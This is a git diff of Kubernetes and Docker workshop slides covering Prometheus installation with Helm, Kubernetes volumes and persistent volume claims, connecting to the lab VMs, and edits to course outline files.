[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
- Would you like to know more? Check this video:

[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU

---

## Checking if Prometheus is installed

- Before trying to install Prometheus, let's check if it's already there

.exercise[

- Look for services with a label `app=prometheus` across all namespaces:
  ```bash
  kubectl get services --selector=app=prometheus --all-namespaces
  ```

]

If we see a `NodePort` service called `prometheus-server`, we're good!

(We can then skip to "Connecting to the Prometheus web UI".)

---

@@ -169,11 +190,11 @@ We need to:

---

## Helm Charts to the rescue
## Helm charts to the rescue

- To make our lives easier, we are going to use a Helm Chart
- To make our lives easier, we are going to use a Helm chart

- The Helm Chart will take care of all the steps explained above
- The Helm chart will take care of all the steps explained above

  (including some extra features that we don't need, but won't hurt)

@@ -210,20 +231,41 @@ We need to:

- Install Prometheus on our cluster:
  ```bash
  helm install stable/prometheus \
       --set server.service.type=NodePort \
       --set server.persistentVolume.enabled=false
  helm upgrade prometheus stable/prometheus \
       --install \
       --namespace kube-system \
       --set server.service.type=NodePort \
       --set server.service.nodePort=30090 \
       --set server.persistentVolume.enabled=false \
       --set alertmanager.enabled=false
  ```

]

The provided flags:
Curious about all these flags? They're explained in the next slide.

- expose the server web UI (and API) on a NodePort
---

- use an ephemeral volume for metrics storage
<br/>
(instead of requesting a Persistent Volume through a Persistent Volume Claim)
class: extra-details

## Explaining all the Helm flags

- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version ...

  (a "release" is a unique name given to an app deployed with Helm)

- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`

- `--install` → if the app doesn't exist, create it

- `--namespace kube-system` → put it in that specific namespace

- And set the following *values* when rendering the chart's templates:

  - `server.service.type=NodePort` → expose the Prometheus server with a NodePort
  - `server.service.nodePort=30090` → set the specific NodePort number to use
  - `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
  - `alertmanager.enabled=false` → disable the alert manager entirely

---

@@ -235,7 +277,7 @@ The provided flags:

- Figure out the NodePort that was allocated to the Prometheus server:
  ```bash
  kubectl get svc | grep prometheus-server
  kubectl get svc --all-namespaces | grep prometheus-server
  ```

- With your browser, connect to that port
@@ -292,7 +334,7 @@ This query will show us CPU usage across all containers:
container_cpu_usage_seconds_total
```

- The suffix of the metrics name tells us:

  - the unit (seconds of CPU)

@@ -486,3 +528,21 @@ class: extra-details
- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview

- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process

---

## In practice

- Grafana is a beautiful (and useful) frontend to display all kinds of graphs

- Not everyone needs to know Prometheus, PromQL, Grafana, etc.

- But in a team, it is valuable to have at least one person who knows them

- That person can set up queries and dashboards for the rest of the team

- It's a little bit like knowing how to optimize SQL queries, Dockerfiles ...

Don't panic if you don't know these tools!

... But make sure at least one person in your team is on it 💯

@@ -49,7 +49,6 @@

---

## Rolling updates in practice

- As of Kubernetes 1.8, we can do rolling updates with:

@@ -64,12 +63,15 @@

## Building a new version of the `worker` service

.warning[
Only run these commands if you have built and pushed DockerCoins to a local registry.
<br/>
If you are using images from the Docker Hub (`dockercoins/worker:v0.1`), skip this.
]

.exercise[

- Go to the `stack` directory:
  ```bash
  cd ~/container.training/stacks
  ```
- Go to the `stacks` directory (`~/container.training/stacks`)

- Edit `dockercoins/worker/worker.py`; update the first `sleep` line to sleep 1 second

@@ -34,13 +34,13 @@

- Each pod can discover the IP address of the others easily

- The pods can have persistent volumes attached to them
- The pods can persist data on attached volumes

🤔 Wait a minute ... Can't we already attach volumes to pods and deployments?

---

## Volumes and Persistent Volumes
## Revisiting volumes

- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:

@@ -50,13 +50,13 @@

  - accessing storage systems

- The last type of volumes is known as a "Persistent Volume"
- Let's see examples of the latter usage

---

## Persistent Volumes types
## Volumes types

- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:

  - public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)

@@ -74,7 +74,7 @@

---

## Using a Persistent Volume
## Using a cloud volume

Here is a pod definition using an AWS EBS volume (that has to be created first):

@@ -99,7 +99,32 @@ spec:

---

## Shortcomings of Persistent Volumes
## Using an NFS volume

Here is another example using a volume on an NFS server:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: pod-using-my-nfs-volume
spec:
  containers:
  - image: ...
    name: container-using-my-nfs-volume
    volumeMounts:
    - mountPath: /my-nfs
      name: my-nfs-volume
  volumes:
  - name: my-nfs-volume
    nfs:
      server: 192.168.0.55
      path: "/exports/assets"
```

---

## Shortcomings of volumes

- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API

@@ -125,17 +150,47 @@ spec:

- This type is a *Persistent Volume Claim*

- A Persistent Volume Claim (PVC) is a resource type

  (visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)

- A PVC is not a volume; it is a *request for a volume*

---

## Persistent Volume Claims in practice

- Using a Persistent Volume Claim is a two-step process:

  - creating the claim

  - using the claim in a pod (as if it were any other kind of volume)

- Between these two steps, something will happen behind the scenes:
- A PVC starts by being Unbound (without an associated volume)

  - Kubernetes will associate an existing volume with the claim
- Once it is associated with a Persistent Volume, it becomes Bound

  - ... or dynamically create a volume if possible and necessary
- A Pod referring to an unbound PVC will not start

  (but as soon as the PVC is bound, the Pod can start)

---

## Binding PV and PVC

- A Kubernetes controller continuously watches PV and PVC objects

- When it notices an unbound PVC, it tries to find a satisfactory PV

  ("satisfactory" in terms of size and other characteristics; see next slide)

- If no PV fits the PVC, a PV can be created dynamically

  (this requires configuring a *dynamic provisioner*; more on that later)

- Otherwise, the PVC remains unbound indefinitely

  (until we manually create a PV or set up dynamic provisioning)

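As an illustration, a minimal claim could be sketched like this (names and sizes are arbitrary):

```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-claim
spec:
  accessModes:
  - ReadWriteOnce          # read-write, mounted by a single node
  resources:
    requests:
      storage: 1Gi
```
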
---

@@ -147,7 +202,9 @@ spec:

- the access mode (e.g. "read-write by a single pod")

- It can also give extra details, like:
- Optionally, it can also specify a Storage Class

- The Storage Class indicates:

  - which storage system to use (e.g. Portworx, EBS...)

@@ -155,8 +212,6 @@

  e.g.: "replicate the data 3 times, and use SSD media"

- The extra details are provided by specifying a Storage Class

---

## What's a Storage Class?

@@ -167,15 +222,15 @@ spec:

- It indicates which *provisioner* to use

  (which controller will create the actual volume)

- And arbitrary parameters for that provisioner

  (replication levels, type of disk ... anything relevant!)

- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)

- Conversely, it is not necessary to define one if you will create volumes manually

(we will see dynamic provisioning in action later)
(but we can also create volumes manually, and ignore Storage Classes)

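For example, a Storage Class for EBS volumes could be sketched like this (the name is arbitrary; `kubernetes.io/aws-ebs` is the in-tree EBS provisioner, and `type` is one of its parameters):

```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: ebs-gp2
provisioner: kubernetes.io/aws-ebs
parameters:
  type: gp2                # general-purpose SSD
```
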
---

@@ -200,7 +255,7 @@ spec:

## Using a Persistent Volume Claim

Here is the same definition as earlier, but using a PVC:
Here is a Pod definition like the ones shown earlier, but using a PVC:

```yaml
apiVersion: v1
@@ -212,7 +267,7 @@ spec:
  - image: ...
    name: container-using-a-claim
    volumeMounts:
    - mountPath: /my-ebs
    - mountPath: /my-vol
      name: my-volume
  volumes:
  - name: my-volume

@@ -1,7 +1,7 @@
## Versions installed

- Kubernetes 1.14.1
- Docker Engine 18.09.5
- Kubernetes 1.14.2
- Docker Engine 18.09.6
- Docker Compose 1.21.1

<!-- ##VERSION## -->

@@ -18,6 +18,8 @@

---

class: extra-details

## Kubernetes volumes vs. Docker volumes

- Kubernetes and Docker volumes are very similar

@@ -35,13 +37,35 @@
- Kubernetes volumes are also used to expose configuration and secrets

- Docker has specific concepts for configuration and secrets

  <br/>
  (but under the hood, the technical implementation is similar)

- If you're not familiar with Docker volumes, you can safely ignore this slide!

---

## Volumes ≠ Persistent Volumes

- Volumes and Persistent Volumes are related, but very different!

- *Volumes*:

  - appear in Pod specifications (see next slide)

  - do not exist as API resources (**cannot** do `kubectl get volumes`)

- *Persistent Volumes*:

  - are API resources (**can** do `kubectl get persistentvolumes`)

  - correspond to concrete volumes (e.g. on a SAN, EBS, etc.)

  - cannot be associated with a Pod directly, but only through a Persistent Volume Claim

  - won't be discussed further in this section

---

## A simple volume example

```yaml

@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!

[Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)

- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”

---

## HTTP traffic handling

@@ -1,43 +0,0 @@
title: |
  Kubernetes
  for Admins and Ops

#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
chat: "[Gitter](https://gitter.im/enix/formation-kubernetes-ops-20190426)"
#chat: "In person!"

gitrepo: github.com/jpetazzo/container.training

slides: http://kadm-2019-04.container.training/

exclude:
- self-paced
- static-pods-exercise

chapters:
- shared/title.md
- logistics.md
- k8s/intro.md
- shared/about-slides.md
- shared/toc.md
- - k8s/prereqs-admin.md
  - k8s/architecture.md
  - k8s/dmuc.md
- - k8s/multinode.md
  - k8s/cni.md
  - k8s/apilb.md
#FIXME: check Laurent Corbes' talk to see if there are other useful things to mention
#BONUS: CoreDNS integration to resolve the names of neighboring clusters
- - k8s/setup-managed.md
  - k8s/setup-selfhosted.md
  - k8s/cluster-upgrade.md
  - k8s/staticpods.md
  - k8s/cluster-backup.md
  - k8s/cloud-controller-manager.md
  - k8s/bootstrap.md
- - k8s/resource-limits.md
  - k8s/metrics-server.md
  - k8s/cluster-sizing.md
- - k8s/lastwords-admin.md
  - k8s/links.md
  - shared/thankyou.md
@@ -20,50 +20,58 @@ chapters:
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - shared/connecting.md
  - k8s/versions-k8s.md
  - shared/sampleapp.md
# - shared/composescale.md
# - shared/hastyconclusions.md
#- shared/composescale.md
#- shared/hastyconclusions.md
  - shared/composedown.md
  - k8s/concepts-k8s.md
  - shared/declarative.md
  - k8s/declarative.md
- - k8s/kubenet.md
  - k8s/kubectlget.md
  - k8s/kubenet.md
- - k8s/kubectlget.md
  - k8s/setup-k8s.md
  - k8s/kubectlrun.md
  - k8s/deploymentslideshow.md
  - k8s/kubectlexpose.md
- - k8s/shippingimages.md
# - k8s/buildshiprun-selfhosted.md
#- k8s/buildshiprun-selfhosted.md
  - k8s/buildshiprun-dockerhub.md
  - k8s/ourapponkube.md
# - k8s/kubectlproxy.md
# - k8s/localkubeconfig.md
# - k8s/accessinternal.md
#- k8s/kubectlproxy.md
#- k8s/localkubeconfig.md
#- k8s/accessinternal.md
  - k8s/dashboard.md
# - k8s/kubectlscale.md
#- k8s/kubectlscale.md
  - k8s/scalingdockercoins.md
  - shared/hastyconclusions.md
  - k8s/daemonset.md
- - k8s/rollout.md
# - k8s/healthchecks.md
  - k8s/namespaces.md
#- k8s/kustomize.md
#- k8s/helm.md
#- k8s/create-chart.md
#- k8s/healthchecks.md
  - k8s/logs-cli.md
  - k8s/logs-centralized.md
#- - k8s/helm.md
# - k8s/namespaces.md
# - k8s/netpol.md
# - k8s/authn-authz.md
#- - k8s/ingress.md
# - k8s/gitworkflows.md
#- k8s/netpol.md
#- k8s/authn-authz.md
#- k8s/csr-api.md
#- k8s/podsecuritypolicy.md
#- k8s/ingress.md
#- k8s/gitworkflows.md
  - k8s/prometheus.md
#- - k8s/volumes.md
# - k8s/build-with-docker.md
# - k8s/build-with-kaniko.md
# - k8s/configuration.md
#- - k8s/owners-and-dependents.md
# - k8s/extending-api.md
# - k8s/statefulsets.md
# - k8s/portworx.md
#- k8s/volumes.md
#- k8s/build-with-docker.md
#- k8s/build-with-kaniko.md
#- k8s/configuration.md
#- k8s/owners-and-dependents.md
#- k8s/extending-api.md
#- k8s/statefulsets.md
#- k8s/local-persistent-volumes.md
#- k8s/portworx.md
#- k8s/staticpods.md
- - k8s/whatsnext.md
  - k8s/links.md
  - shared/thankyou.md

@@ -1,62 +0,0 @@
title: |
  Kubernetes 101

#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
#chat: "[Gitter](https://gitter.im/jpetazzo/training-20180413-paris)"
chat: "In person!"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- self-paced

chapters:
- shared/title.md
#- logistics.md
# Bridget-specific; others use logistics.md
- logistics-bridget.md
- k8s/intro.md
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - k8s/versions-k8s.md
  - shared/sampleapp.md
# Bridget doesn't go into as much depth with compose
#- shared/composescale.md
#- shared/hastyconclusions.md
  - shared/composedown.md
  - k8s/concepts-k8s.md
  - shared/declarative.md
  - k8s/declarative.md
  - k8s/kubenet.md
  - k8s/kubectlget.md
  - k8s/setup-k8s.md
- - k8s/kubectlrun.md
  - k8s/kubectlexpose.md
  - k8s/shippingimages.md
#- k8s/buildshiprun-selfhosted.md
  - k8s/buildshiprun-dockerhub.md
  - k8s/ourapponkube.md
#- k8s/kubectlproxy.md
#- k8s/localkubeconfig.md
#- k8s/accessinternal.md
- - k8s/dashboard.md
#- k8s/kubectlscale.md
  - k8s/scalingdockercoins.md
  - shared/hastyconclusions.md
  - k8s/daemonset.md
  - k8s/rollout.md
- - k8s/logs-cli.md
# Bridget hasn't added EFK yet
#- k8s/logs-centralized.md
  - k8s/helm.md
  - k8s/namespaces.md
#- k8s/netpol.md
  - k8s/whatsnext.md
# - k8s/links.md
# Bridget-specific
  - k8s/links-bridget.md
  - shared/thankyou.md
@@ -20,6 +20,7 @@ chapters:
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - shared/connecting.md
  - k8s/versions-k8s.md
  - shared/sampleapp.md
  - shared/composescale.md
@@ -32,8 +33,9 @@ chapters:
  - k8s/kubectlget.md
  - k8s/setup-k8s.md
  - k8s/kubectlrun.md
  - k8s/kubectlexpose.md
- - k8s/shippingimages.md
  - k8s/deploymentslideshow.md
- - k8s/kubectlexpose.md
  - k8s/shippingimages.md
  - k8s/buildshiprun-selfhosted.md
  - k8s/buildshiprun-dockerhub.md
  - k8s/ourapponkube.md
@@ -41,18 +43,22 @@ chapters:
  - k8s/localkubeconfig.md
  - k8s/accessinternal.md
  - k8s/dashboard.md
  - k8s/kubectlscale.md
- - k8s/kubectlscale.md
# - k8s/scalingdockercoins.md
# - shared/hastyconclusions.md
  - k8s/daemonset.md
- - k8s/rollout.md
  - k8s/rollout.md
  - k8s/namespaces.md
- - k8s/kustomize.md
  - k8s/helm.md
  - k8s/create-chart.md
  - k8s/healthchecks.md
  - k8s/logs-cli.md
  - k8s/logs-centralized.md
- - k8s/helm.md
  - k8s/namespaces.md
  - k8s/netpol.md
- - k8s/netpol.md
  - k8s/authn-authz.md
  - k8s/csr-api.md
  - k8s/podsecuritypolicy.md
- - k8s/ingress.md
  - k8s/gitworkflows.md
  - k8s/prometheus.md
@@ -62,7 +68,8 @@ chapters:
  - k8s/configuration.md
- - k8s/owners-and-dependents.md
  - k8s/extending-api.md
  - k8s/statefulsets.md
- - k8s/statefulsets.md
  - k8s/local-persistent-volumes.md
  - k8s/portworx.md
  - k8s/staticpods.md
- - k8s/whatsnext.md

@@ -20,6 +20,7 @@ chapters:
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - shared/connecting.md
  - k8s/versions-k8s.md
  - shared/sampleapp.md
#- shared/composescale.md
@@ -28,10 +29,11 @@ chapters:
  - k8s/concepts-k8s.md
  - shared/declarative.md
  - k8s/declarative.md
- - k8s/kubenet.md
  - k8s/kubectlget.md
  - k8s/kubenet.md
- - k8s/kubectlget.md
  - k8s/setup-k8s.md
  - k8s/kubectlrun.md
  - k8s/deploymentslideshow.md
  - k8s/kubectlexpose.md
- - k8s/shippingimages.md
#- k8s/buildshiprun-selfhosted.md
@@ -46,13 +48,17 @@ chapters:
  - shared/hastyconclusions.md
- - k8s/daemonset.md
  - k8s/rollout.md
  - k8s/healthchecks.md
  - k8s/namespaces.md
  - k8s/kustomize.md
#- k8s/helm.md
#- k8s/create-chart.md
- - k8s/healthchecks.md
  - k8s/logs-cli.md
  - k8s/logs-centralized.md
- - k8s/helm.md
  - k8s/namespaces.md
  - k8s/netpol.md
#- k8s/netpol.md
  - k8s/authn-authz.md
  - k8s/csr-api.md
  - k8s/podsecuritypolicy.md
- - k8s/ingress.md
#- k8s/gitworkflows.md
  - k8s/prometheus.md
@@ -61,10 +67,11 @@ chapters:
#- k8s/build-with-kaniko.md
  - k8s/configuration.md
#- k8s/owners-and-dependents.md
  - k8s/extending-api.md
#- k8s/extending-api.md
- - k8s/statefulsets.md
  - k8s/local-persistent-volumes.md
  - k8s/portworx.md
  - k8s/staticpods.md
#- k8s/staticpods.md
- - k8s/whatsnext.md
  - k8s/links.md
  - shared/thankyou.md

@@ -2,18 +2,34 @@

- Hello! We are:

  - .emoji[🚁] Alexandre ([@alexbuisine](https://twitter.com/alexbuisine), Enix SAS)
  - .emoji[👷🏻‍♀️] AJ ([@s0ulshake](https://twitter.com/s0ulshake), Travis CI)

  - .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Enix SAS)

- The workshop will run from 9:15am to 5:30pm

- There will be a lunch break at noon

  (And coffee breaks!)
  - .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Tiny Shell Script LLC)

- Feel free to interrupt for questions at any time

- *Especially when you see full screen container pictures!*

- Live feedback, questions, help: @@CHAT@@

  (Let's make sure right now that we all are on that channel!)

---

## Logistics

Training schedule for the 3 days:

|||
|-------------------|--------------------|
| 9:00am | Start of training
| 10:30am → 11:00am | Break
| 12:30pm → 1:30pm | Lunch
| 3:00pm → 3:30pm | Break
| 5:00pm | End of training

- Lunch will be catered

- During the breaks, the instructors will be available for Q&A

- Make sure to hydrate / caffeinate / stretch out your limbs :)

@@ -1,17 +0,0 @@
.remark-slide-content:not(.pic) {
  background-repeat: no-repeat;
  background-position: 99% 1%;
  background-size: 8%;
  background-image: url(https://enix.io/static/img/logos/logo-domain-cropped.png);
}

div.extra-details:not(.pic) {
  background-image: url("images/extra-details.png"), url(https://enix.io/static/img/logos/logo-domain-cropped.png);
  background-position: 0.5% 1%, 99% 1%;
  background-size: 4%, 8%;
}

.remark-slide-content:not(.pic) div.remark-slide-number {
  top: 16px;
  right: 112px
}
133
slides/shared/connecting.md
Normal file
@@ -0,0 +1,133 @@
class: in-person

## Connecting to our lab environment

.exercise[

- Log into the first VM (`node1`) with your SSH client

<!--
```bash
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
  ssh -o StrictHostKeyChecking=no $N true
done
```

```bash
## FIXME find a way to reset the cluster, maybe?
```
-->

- Check that you can SSH (without password) to `node2`:
  ```bash
  ssh node2
  ```
- Type `exit` or `^D` to come back to `node1`

<!-- ```bash exit``` -->

]

If anything goes wrong — ask for help!

---

## Doing or re-doing the workshop on your own?

- Use something like
  [Play-With-Docker](http://play-with-docker.com/) or
  [Play-With-Kubernetes](https://training.play-with-kubernetes.com/)

  Zero setup effort; but environments are short-lived and
  might have limited resources

- Create your own cluster (local or cloud VMs)

  Small setup effort; small cost; flexible environments

- Create a bunch of clusters for you and your friends
  ([instructions](https://@@GITREPO@@/tree/master/prepare-vms))

  Bigger setup effort; ideal for group training

---

class: self-paced

## Get your own Docker nodes

- If you already have some Docker nodes: great!

- If not: let's get some, thanks to Play-With-Docker

.exercise[

- Go to http://www.play-with-docker.com/

- Log in

- Create your first node

<!-- ```open http://www.play-with-docker.com/``` -->

]

You will need a Docker ID to use Play-With-Docker.

(Creating a Docker ID is free.)

---

## We will (mostly) interact with node1 only

*These remarks apply only when using multiple nodes, of course.*

- Unless instructed, **all commands must be run from the first VM, `node1`**

- We will only check out/copy the code on `node1`

- During normal operations, we do not need access to the other nodes

- If we had to troubleshoot issues, we would use a combination of:

  - SSH (to access system logs, daemon status...)

  - Docker API (to check running containers and container engine status)

---

## Terminals

Once in a while, the instructions will say:
<br/>"Open a new terminal."

There are multiple ways to do this:

- create a new window or tab on your machine, and SSH into the VM;

- use screen or tmux on the VM and open a new window from there.

You are welcome to use the method that you feel the most comfortable with.

---

## Tmux cheatsheet

[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.

*You don't have to use it or even know about it to follow along.
<br/>
But some of us like to use it to switch between terminals.
<br/>
It has been preinstalled on your workshop nodes.*

- Ctrl-b c → create a new window
- Ctrl-b n → go to next window
- Ctrl-b p → go to previous window
- Ctrl-b " → split window top/bottom
- Ctrl-b % → split window left/right
- Ctrl-b Alt-1 → rearrange windows in columns
- Ctrl-b Alt-2 → rearrange windows in rows
- Ctrl-b arrows → navigate to other windows
- Ctrl-b d → detach session
- tmux attach → reattach to session

@@ -169,143 +169,3 @@ class: in-person, extra-details
- It requires UDP ports to be open

  (By default, it uses a UDP port between 60000 and 61000)

---

class: in-person

## Connecting to our lab environment

.exercise[

- Log into the first VM (`node1`) with your SSH client

<!--
```bash
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
  ssh -o StrictHostKeyChecking=no $N true
done
```

```bash
if which kubectl; then
  kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
  kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
  kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
fi
```
-->

- Check that you can SSH (without password) to `node2`:
  ```bash
  ssh node2
  ```
- Type `exit` or `^D` to come back to `node1`

<!-- ```bash exit``` -->

]

If anything goes wrong — ask for help!

---

## Doing or re-doing the workshop on your own?

- Use something like
  [Play-With-Docker](http://play-with-docker.com/) or
  [Play-With-Kubernetes](https://training.play-with-kubernetes.com/)

  Zero setup effort; but environments are short-lived and
  might have limited resources

- Create your own cluster (local or cloud VMs)

  Small setup effort; small cost; flexible environments

- Create a bunch of clusters for you and your friends
  ([instructions](https://@@GITREPO@@/tree/master/prepare-vms))

  Bigger setup effort; ideal for group training

---

class: self-paced

## Get your own Docker nodes

- If you already have some Docker nodes: great!

- If not: let's get some, thanks to Play-With-Docker

.exercise[

- Go to http://www.play-with-docker.com/

- Log in

- Create your first node

<!-- ```open http://www.play-with-docker.com/``` -->

]

You will need a Docker ID to use Play-With-Docker.

(Creating a Docker ID is free.)

---

## We will (mostly) interact with node1 only

*These remarks apply only when using multiple nodes, of course.*

- Unless instructed, **all commands must be run from the first VM, `node1`**

- We will only check out/copy the code on `node1`

- During normal operations, we do not need access to the other nodes

- If we had to troubleshoot issues, we would use a combination of:

  - SSH (to access system logs, daemon status...)

  - Docker API (to check running containers and container engine status)

---

## Terminals

Once in a while, the instructions will say:
<br/>"Open a new terminal."

There are multiple ways to do this:

- create a new window or tab on your machine, and SSH into the VM;

- use screen or tmux on the VM and open a new window from there.

You are welcome to use the method that you feel the most comfortable with.

---

## Tmux cheatsheet

[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.

*You don't have to use it or even know about it to follow along.
<br/>
But some of us like to use it to switch between terminals.
<br/>
It has been preinstalled on your workshop nodes.*

- Ctrl-b c → create a new window
- Ctrl-b n → go to next window
- Ctrl-b p → go to previous window
- Ctrl-b " → split window top/bottom
- Ctrl-b % → split window left/right
- Ctrl-b Alt-1 → rearrange windows in columns
- Ctrl-b Alt-2 → rearrange windows in rows
- Ctrl-b arrows → navigate to other windows
- Ctrl-b d → detach session
- tmux attach → reattach to session

@@ -8,14 +8,8 @@ class: title, self-paced

class: title, in-person

@@TITLE@@<br/><br/>

.footnote[
WiFi: 123_SEBASTOPOL
<br/>
Password: Sebastopol02
@@TITLE@@

**Slides
[:](https://www.youtube.com/watch?v=h16zyxiwDLY)
[→](https://www.youtube.com/watch?v=h16zyxiwDLY)
@@SLIDES@@**
]

@@ -1,64 +0,0 @@
title: |
  Container Orchestration
  with Docker and Swarm

chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- self-paced
- snap
- btp-auto
- benchmarking
- elk-manual
- prom-manual

chapters:
- shared/title.md
- logistics.md
- swarm/intro.md
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - swarm/versions.md
  - shared/sampleapp.md
  - shared/composescale.md
  - shared/hastyconclusions.md
  - shared/composedown.md
  - swarm/swarmkit.md
  - shared/declarative.md
  - swarm/swarmmode.md
  - swarm/creatingswarm.md
#- swarm/machine.md
  - swarm/morenodes.md
- - swarm/firstservice.md
  - swarm/ourapponswarm.md
  - swarm/hostingregistry.md
  - swarm/testingregistry.md
  - swarm/btp-manual.md
  - swarm/swarmready.md
  - swarm/stacks.md
  - swarm/cicd.md
  - swarm/updatingservices.md
  - swarm/rollingupdates.md
  - swarm/healthchecks.md
- - swarm/operatingswarm.md
  - swarm/netshoot.md
  - swarm/ipsec.md
  - swarm/swarmtools.md
  - swarm/security.md
  - swarm/secrets.md
  - swarm/encryptionatrest.md
  - swarm/leastprivilege.md
  - swarm/apiscope.md
- - swarm/logging.md
  - swarm/metrics.md
  - swarm/gui.md
  - swarm/stateful.md
  - swarm/extratips.md
- shared/thankyou.md
- swarm/links.md
@@ -1,63 +0,0 @@
title: |
  Container Orchestration
  with Docker and Swarm

chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- self-paced
- snap
- btp-manual
- benchmarking
- elk-manual
- prom-manual

chapters:
- shared/title.md
- logistics.md
- swarm/intro.md
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - swarm/versions.md
  - shared/sampleapp.md
  - shared/composescale.md
  - shared/hastyconclusions.md
  - shared/composedown.md
  - swarm/swarmkit.md
  - shared/declarative.md
  - swarm/swarmmode.md
  - swarm/creatingswarm.md
#- swarm/machine.md
  - swarm/morenodes.md
- - swarm/firstservice.md
  - swarm/ourapponswarm.md
#- swarm/hostingregistry.md
#- swarm/testingregistry.md
#- swarm/btp-manual.md
#- swarm/swarmready.md
  - swarm/stacks.md
  - swarm/cicd.md
  - swarm/updatingservices.md
#- swarm/rollingupdates.md
#- swarm/healthchecks.md
- - swarm/operatingswarm.md
#- swarm/netshoot.md
#- swarm/ipsec.md
#- swarm/swarmtools.md
  - swarm/security.md
#- swarm/secrets.md
#- swarm/encryptionatrest.md
  - swarm/leastprivilege.md
  - swarm/apiscope.md
  - swarm/logging.md
  - swarm/metrics.md
#- swarm/stateful.md
#- swarm/extratips.md
- shared/thankyou.md
- swarm/links.md
@@ -1,72 +0,0 @@
title: |
  Container Orchestration
  with Docker and Swarm

chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- in-person
- btp-auto

chapters:
- shared/title.md
#- shared/logistics.md
- swarm/intro.md
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - swarm/versions.md
- |
  name: part-1

  class: title, self-paced

  Part 1
- shared/sampleapp.md
- shared/composescale.md
- shared/hastyconclusions.md
- shared/composedown.md
- swarm/swarmkit.md
- shared/declarative.md
- swarm/swarmmode.md
- swarm/creatingswarm.md
#- swarm/machine.md
- swarm/morenodes.md
- - swarm/firstservice.md
  - swarm/ourapponswarm.md
  - swarm/hostingregistry.md
  - swarm/testingregistry.md
  - swarm/btp-manual.md
  - swarm/swarmready.md
  - swarm/stacks.md
  - swarm/cicd.md
- |
  name: part-2

  class: title, self-paced

  Part 2
- - swarm/operatingswarm.md
  - swarm/netshoot.md
  - swarm/swarmnbt.md
  - swarm/ipsec.md
  - swarm/updatingservices.md
  - swarm/rollingupdates.md
  - swarm/healthchecks.md
  - swarm/nodeinfo.md
  - swarm/swarmtools.md
- - swarm/security.md
  - swarm/secrets.md
  - swarm/encryptionatrest.md
  - swarm/leastprivilege.md
  - swarm/apiscope.md
  - swarm/logging.md
  - swarm/metrics.md
  - swarm/stateful.md
  - swarm/extratips.md
- shared/thankyou.md
- swarm/links.md
@@ -1,71 +0,0 @@
title: |
  Container Orchestration
  with Docker and Swarm

chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- in-person
- btp-auto

chapters:
- shared/title.md
#- shared/logistics.md
- swarm/intro.md
- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
  - swarm/versions.md
- |
  name: part-1

  class: title, self-paced

  Part 1
- shared/sampleapp.md
- shared/composescale.md
- shared/hastyconclusions.md
- shared/composedown.md
- swarm/swarmkit.md
- shared/declarative.md
- swarm/swarmmode.md
- swarm/creatingswarm.md
#- swarm/machine.md
- swarm/morenodes.md
- - swarm/firstservice.md
  - swarm/ourapponswarm.md
